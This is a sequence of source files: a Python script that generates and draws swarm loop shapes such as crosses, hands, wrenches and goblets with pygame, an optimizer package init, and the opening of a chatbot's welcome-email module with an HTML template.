# node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-cross #####
# filename = '30-cross'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-cross #####
# filename = '100-cross'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 17)
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 7)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 7)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 16)
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-hand #####
# filename = '30-hand'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (20.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (20.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (55.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# # small finger
# heading_angle = reset_radian(heading_angle - (15.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (85.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# # middle finger(no ring finger)
# heading_angle = reset_radian(heading_angle - (147.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (85.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# # index finger
# heading_angle = reset_radian(heading_angle - (147.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (85.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# # thumb
# heading_angle = reset_radian(heading_angle - (125.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (85.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (85.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-hand #####
# filename = '100-hand'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 6)
# heading_angle = reset_radian(heading_angle + (45.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (35.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# # small finger
# heading_angle = reset_radian(heading_angle - (15.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 6)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (44.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = reset_radian(heading_angle - (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# # ring finger
# heading_angle = reset_radian(heading_angle - (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 7)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (44.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 7)
# heading_angle = reset_radian(heading_angle - (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# # middle finger
# heading_angle = reset_radian(heading_angle - (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (44.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = reset_radian(heading_angle - (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# # index finger
# heading_angle = reset_radian(heading_angle - (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 7)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (44.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = reset_radian(heading_angle - (10.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# # thumb
# heading_angle = reset_radian(heading_angle - (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (40.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 9)
# heading_angle = reset_radian(heading_angle + (20.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
#     pickle.dump(node_poses, f)
# ##### script to generate 30-wrench #####
# filename = '30-wrench'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# # half the wrench is finished, mirror the next half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,15):
#     old_vect = node_poses[i] - node_poses[0]
#     node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
#     pickle.dump(node_poses, f)
# ##### script to generate 100-wrench #####
# filename = '100-wrench'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 20)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# # half the wrench is finished, mirror the next half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,50):
#     old_vect = node_poses[i] - node_poses[0]
#     node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
#     pickle.dump(node_poses, f)
# ##### script to generate 30-goblet #####
# filename = '30-goblet'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# arc_angle = 10.8 # default 11.25 deg
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (135*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (30*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = (arc_angle*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (2*arc_angle*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (2*arc_angle*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (2*arc_angle*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# # half the goblet is finished, mirror the other half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,15):
#     old_vect = node_poses[i] - node_poses[0]
#     node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
#     pickle.dump(node_poses, f)
# ##### script to generate 100-goblet #####
# filename = '100-goblet'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# arc_angle = 4.1
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 7)
# heading_angle = (120*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 10)
# heading_angle = -(arc_angle*math.pi)/180.0
# for _ in range(10):
#     heading_angle = reset_radian(heading_angle + (2*arc_angle*math.pi)/180.0)
#     node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# # half the goblet is finished, mirror the other half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,50):
#     old_vect = node_poses[i] - node_poses[0]
#     node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
#     pickle.dump(node_poses, f)
# ##### script to generate 30-lamp #####
# filename = '30-lamp'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = (132*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = ((180-15)*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = (110*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# # half the lamp is finished, mirror the other half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,15):
#     old_vect = node_poses[i] - node_poses[0]
#     node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
#     pickle.dump(node_poses, f)
# ##### script to generate 100-lamp #####
# filename = '100-lamp'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 6)
# heading_angle = (100*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = (140*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = (160*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = (175*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 7)
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 10)
# heading_angle = (110*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 15)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 6)
# # half the lamp is finished, mirror the other half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,50):
#     old_vect = node_poses[i] - node_poses[0]
#     node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
#     pickle.dump(node_poses, f)
# ##### script to generate 30-K #####
# filename = '30-K'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# angle_up = (50*math.pi)/180.0
# angle_down = -(50*math.pi)/180.0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = angle_down
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = angle_up
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(angle_down + math.pi)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = angle_up
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(angle_down + math.pi)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(angle_up - math.pi)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 6)
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
#     pickle.dump(node_poses, f)
# ##### script to generate 100-K #####
# filename = '100-K'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# angle_up = (49*math.pi)/180.0
# angle_down = -(49*math.pi)/180.0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 6)
# heading_angle = angle_up
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = angle_down
# node_index = cal_next_node(node_poses, node_index, heading_angle, 10)
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = reset_radian(angle_down + math.pi)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 14)
# heading_angle = angle_up
# node_index = cal_next_node(node_poses, node_index, heading_angle, 11)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = reset_radian(angle_up - math.pi)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 10)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 19)
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
#     pickle.dump(node_poses, f)
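Every commented shape script above finishes a symmetric shape the same way: it lays out half the outline node by node, then reflects each placed node across the symmetry axis with the vector identity p' = 2(a·v)a − v, where a is the unit vector along the axis and v is the node's offset from the axis origin. A minimal self-contained sketch of that mirroring step (names like `mirror_across_axis` are illustrative, not from the scripts above):

```python
import numpy as np

def mirror_across_axis(points, origin, axis_point):
    """Reflect 2D points across the line through origin and axis_point."""
    a = axis_point - origin
    a = a / np.linalg.norm(a)      # unit vector along the symmetry axis
    v = points - origin            # offsets relative to the axis origin
    proj = v @ a                   # scalar projection of each offset onto a
    # reflection: p' = 2*(a . v)*a - v, applied row-wise
    return origin + 2.0 * np.outer(proj, a) - v

# mirror a point across the x-axis: (1, 1) -> (1, -1)
print(mirror_across_axis(np.array([[1.0, 1.0]]),
                         np.array([0.0, 0.0]),
                         np.array([1.0, 0.0])))
```

The scripts can skip the `origin +` term because `node_poses[0]` is always at (0, 0) when the mirroring runs.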
pygame.init()
# find the right world and screen sizes
x_max, y_max = np.max(node_poses, axis=0)
x_min, y_min = np.min(node_poses, axis=0)
pixel_per_length = 30
world_size = (x_max - x_min + 2.0, y_max - y_min + 2.0)
screen_size = (int(world_size[0])*pixel_per_length, int(world_size[1])*pixel_per_length)
# convert node poses in the world to disp poses on screen
def cal_disp_poses():
    poses_temp = np.zeros((swarm_size, 2))
    # shift the loop to the middle of the world
    middle = np.array([(x_max+x_min)/2.0, (y_max+y_min)/2.0])
    for i in range(swarm_size):
        poses_temp[i] = (node_poses[i] - middle +
                         np.array([world_size[0]/2.0, world_size[1]/2.0]))
    # convert to display coordinates
    poses_temp[:,0] = poses_temp[:,0] / world_size[0]
    poses_temp[:,0] = poses_temp[:,0] * screen_size[0]
    poses_temp[:,1] = poses_temp[:,1] / world_size[1]
    poses_temp[:,1] = 1.0 - poses_temp[:,1]
    poses_temp[:,1] = poses_temp[:,1] * screen_size[1]
    return poses_temp.astype(int)
disp_poses = cal_disp_poses()
# draw the loop shape on pygame window
color_white = (255,255,255)
color_black = (0,0,0)
screen = pygame.display.set_mode(screen_size)
screen.fill(color_white)
for i in range(swarm_size):
    pygame.draw.circle(screen, color_black, disp_poses[i], 5, 0)
for i in range(swarm_size-1):
    pygame.draw.line(screen, color_black, disp_poses[i], disp_poses[i+1], 2)
pygame.draw.line(screen, color_black, disp_poses[0], disp_poses[swarm_size-1], 2)
pygame.display.update()
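# cal_disp_poses() above is the usual world-to-screen mapping: recenter, normalize
# to [0, 1], flip the y axis (screen y grows downward), then scale to pixels. The
# same transform for a single, already-recentered point looks like this (the
# function name and arguments are illustrative, not part of this script):

```python
def world_to_screen(p, world_size, screen_size):
    """Map a world point (origin bottom-left, y up) to pixel coordinates
    (origin top-left, y down)."""
    x = p[0] / world_size[0] * screen_size[0]
    y = (1.0 - p[1] / world_size[1]) * screen_size[1]
    return int(x), int(y)

# the world's bottom-left corner maps to the bottom row of the screen
print(world_to_screen((0.0, 0.0), (10.0, 10.0), (300, 300)))  # (0, 300)
```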
# # save the screen as image
# filepath = os.path.join('images',filename+'.png')
# pygame.image.save(screen, filepath)
raw_input("<Press ENTER to exit>")
# file: machina/optims/__init__.py (repo AswinRetnakumar/Machina, MIT license)
from machina.optims.adamw import AdamW
from machina.optims.distributed_adamw import DistributedAdamW
from machina.optims.distributed_sgd import DistributedSGD
# file: model/sendemail.py (repo IlhamriSKY/vanika-chatbot-line, Apache-2.0 license)
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# Database
from controler.config import Config
class Email(object):
    @staticmethod
    def kirimEmail(email, username, userid):
        # me == my email address
        # you == recipient's email address
        me = "vanika@unika.ac.id"
        you = email
        header = "Selamat datang di VANIKA"  # "Welcome to VANIKA"
        nickname = username
        user_id = userid
        img = "https://vanika.tru.io/vanikabot/welcomeemail.jpg"
        # Create message container - the correct MIME type is multipart/alternative.
        msg = MIMEMultipart('alternative')
        msg['Subject'] = "Vanika Say Thanks"
        msg['From'] = me
        msg['To'] = you
        # Create the body of the message (a plain-text and an HTML version).
        text = "Vanika Say Thanks"
        html = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional //EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<!--[if gte mso 9]><xml><o:OfficeDocumentSettings><o:AllowPNG/><o:PixelsPerInch>96</o:PixelsPerInch></o:OfficeDocumentSettings></xml><![endif]-->
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<meta content="width=device-width" name="viewport"/>
<!--[if !mso]><!-->
<meta content="IE=edge" http-equiv="X-UA-Compatible"/>
<!--<![endif]-->
<title></title>
<!--[if !mso]><!-->
<!--<![endif]-->
<style type="text/css">
body {
margin: 0;
padding: 0;
}
table,
td,
tr {
vertical-align: top;
border-collapse: collapse;
}
* {
line-height: inherit;
}
a[x-apple-data-detectors=true] {
color: inherit !important;
text-decoration: none !important;
}
</style>
<style id="media-query" type="text/css">
@media (max-width: 520px) {
.block-grid,
.col {
min-width: 320px !important;
max-width: 100% !important;
display: block !important;
}
.block-grid {
width: 100% !important;
}
.col {
width: 100% !important;
}
.col>div {
margin: 0 auto;
}
img.fullwidth,
img.fullwidthOnMobile {
max-width: 100% !important;
}
.no-stack .col {
min-width: 0 !important;
display: table-cell !important;
}
.no-stack.two-up .col {
width: 50% !important;
}
.no-stack .col.num4 {
width: 33% !important;
}
.no-stack .col.num8 {
width: 66% !important;
}
.no-stack .col.num4 {
width: 33% !important;
}
.no-stack .col.num3 {
width: 25% !important;
}
.no-stack .col.num6 {
width: 50% !important;
}
.no-stack .col.num9 {
width: 75% !important;
}
.video-block {
max-width: none !important;
}
.mobile_hide {
min-height: 0px;
max-height: 0px;
max-width: 0px;
display: none;
overflow: hidden;
font-size: 0px;
}
.desktop_hide {
display: block !important;
max-height: none !important;
}
}
</style>
</head>
<body class="clean-body" style="margin: 0; padding: 0; -webkit-text-size-adjust: 100%; background-color: #FFFFFF;">
<!--[if IE]><div class="ie-browser"><![endif]-->
<table bgcolor="#FFFFFF" cellpadding="0" cellspacing="0" class="nl-container" role="presentation" style="table-layout: fixed; vertical-align: top; min-width: 320px; Margin: 0 auto; border-spacing: 0; border-collapse: collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt; background-color: #FFFFFF; width: 100%;" valign="top" width="100%">
<tbody>
<tr style="vertical-align: top;" valign="top">
<td style="word-break: break-word; vertical-align: top;" valign="top">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td align="center" style="background-color:#FFFFFF"><![endif]-->
<div style="background-color:#02A4E8;">
<div class="block-grid" style="Margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color:transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0" style="background-color:#02A4E8;"><tr><td align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:500px"><tr class="layout-full-width" style="background-color:transparent"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="500" style="background-color:transparent;width:500px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;" valign="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px;"><![endif]-->
<div class="col num12" style="min-width: 320px; max-width: 500px; display: table-cell; vertical-align: top; width: 500px;">
<div style="width:100% !important;">
<!--[if (!mso)&(!IE)]><!-->
<div style="border-top:0px solid transparent; border-left:0px solid transparent; border-bottom:0px solid transparent; border-right:0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;">
<!--<![endif]-->
<!--[if mso]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 10px; padding-left: 10px; padding-top: 10px; padding-bottom: 10px; font-family: Arial, sans-serif"><![endif]-->
<div style="color:#555555;font-family:Arial, 'Helvetica Neue', Helvetica, sans-serif;line-height:1.2;padding-top:10px;padding-right:10px;padding-bottom:10px;padding-left:10px;">
